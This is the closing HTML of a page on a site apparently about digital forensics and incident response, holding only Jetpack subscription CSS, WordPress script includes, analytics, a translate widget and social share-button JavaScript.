.components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form input[type=email]{box-sizing:border-box;cursor:pointer;line-height:1.3;min-width:auto!important;white-space:nowrap!important}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__button[contenteditable=true],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__button[contenteditable=true]{white-space:pre-wrap!important}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form input[type=email]::placeholder,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form input[type=email]:disabled,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form input[type=email]::placeholder,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form input[type=email]:disabled{color:currentColor;opacity:.5}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form button{border-color:#0000;border-style:solid}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email{background:#0000;flex-grow:1}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email input[type=email]{height:auto;margin:0;width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-submit,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-submit{line-height:0;margin:0;padding:0}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__show-subs .wp-block-jetpack-subscriptions__subscount{font-size:16px;margin:8px 0;text-align:end}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__form-elements{display:block}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline button{display:inline-block;max-width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__subscount{text-align:start}#subscribe-submit.is-link{text-align:center;width:auto!important}#subscribe-submit.is-link a{margin-left:0!important;margin-top:0!important;width:auto!important}@keyframes jetpack-memberships_button__spinner-animation{to{transform:rotate(1turn)}}.jetpack-memberships-spinner{display:none;height:1em;margin:0 0 0 5px;width:1em}.jetpack-memberships-spinner svg{height:100%;margin-bottom:-2px;width:100%}.jetpack-memberships-spinner-rotating{animation:jetpack-memberships_button__spinner-animation .75s linear infinite;transform-origin:center}.is-loading .jetpack-memberships-spinner{display:inline-block}body.jetpack-memberships-modal-open{overflow:hidden}dialog.jetpack-memberships-modal{opacity:1}dialog.jetpack-memberships-modal,dialog.jetpack-memberships-modal iframe{background:#0000;border:0;bottom:0;box-shadow:none;height:100%;left:0;margin:0;padding:0;position:fixed;right:0;top:0;width:100%}dialog.jetpack-memberships-modal::backdrop{background-color:#000;opacity:.7;transition:opacity .2s ease-out}dialog.jetpack-memberships-modal.is-loading,dialog.jetpack-memberships-modal.is-loading::backdrop{opacity:0} </style> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/navigation.min.js?ver=6.7.1" id="freenews-navigation-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/skip-link-focus-fix.js?ver=6.7.1" id="freenews-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/ResizeSensor.min.js?ver=6.7.1" id="ResizeSensor-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/theia-sticky-sidebar.min.js?ver=6.7.1" id="theia-sticky-sidebar-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick.min.js?ver=6.7.1" id="slick-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick-settings.js?ver=6.7.1" id="freenews-slick-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/jquery.sticky.js?ver=6.7.1" id="jquery-sticky-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/sticky-setting.js?ver=6.7.1" id="freenews-sticky-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/jquery.marquee.min.js?ver=6.7.1" id="marquee-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/marquee-settings.js?ver=6.7.1" id="freenews-marquee-settings-js"></script> <script type="text/javascript" src="https://stats.wp.com/e-202448.js" id="jetpack-stats-js" data-wp-strategy="defer"></script> <script type="text/javascript" id="jetpack-stats-js-after"> /* <![CDATA[ */ _stq = window._stq || []; _stq.push([ "view", JSON.parse("{\"v\":\"ext\",\"blog\":\"175340963\",\"post\":\"4690\",\"tz\":\"0\",\"srv\":\"thedfirreport.com\",\"j\":\"1:14.0\"}") ]); _stq.push([ "clickTrackerInit", "175340963", "4690" ]); /* ]]> */ </script> <script type="text/javascript" id="google-translate-init-js-extra"> /* <![CDATA[ */ var _wp_google_translate_widget = {"lang":"en_US","layout":"0"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.0/_inc/build/widgets/google-translate/google-translate.min.js" id="google-translate-init-js"></script> <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit&ver=14.0" id="google-translate-js"></script> <script type="text/javascript" id="jetpack-blocks-assets-base-url-js-before"> /* <![CDATA[ */ var Jetpack_Block_Assets_Base_Url="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/"; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/dist/dom-ready.min.js" id="wp-dom-ready-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.1/wp-includes/js/dist/vendor/wp-polyfill.min.js" id="wp-polyfill-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/subscriptions/view.js?minify=false&ver=14.0" id="jetpack-block-subscriptions-js"></script> <script type="text/javascript" id="sharing-js-js-extra"> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.0/_inc/build/sharedaddy/sharing.min.js" id="sharing-js-js"></script> <script type="text/javascript" id="sharing-js-js-after"> /* <![CDATA[ */ var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-twitter' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-linkedin' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-linkedin' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-facebook' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' ); return false; } } ); } )(); /* ]]> */ </script> </body> </html>